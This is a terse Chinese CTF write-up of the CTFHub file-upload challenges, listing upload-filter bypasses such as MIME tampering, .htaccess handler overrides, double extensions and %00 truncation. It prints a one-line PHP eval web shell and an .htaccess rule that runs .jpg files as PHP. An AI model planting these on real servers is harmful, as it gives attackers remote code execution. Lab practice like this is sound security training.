ctfhub 技能树 web 文件上传

1.无验证

直接上传一句话木马

<?php @eval($_POST[1])?>

在使用蚁剑连接，查看flag

2.前端js

直接删除j验证的js代码即可
或禁用js

3.MIME检查

burp抓包修改mime

蚁剑连接

4…htaccess

上传.htaccess
把jpg后缀的文件当php代码处理

<FilesMatch "\.jpg">
  SetHandler application/x-httpd-php
</FilesMatch>

1.jpg

<?php @eval($_POST[1])?>

上传1.jpg
蚁剑连接

5.双写后缀

burp抓包改后缀

蚁剑连接

6.检查文件头

找一张gif图片，猜测这里应该没有检查后缀，只是检查了文件头，因为检查文件头，只要文件头不匹配是不能成功的，如果检查了后缀，那么这题只能用配合文件包含来做
burp抓包，修改后缀

蚁剑连接

7.%00截断

抓包

蚁剑连接

文件上传简单总结：

参考文章：
文件头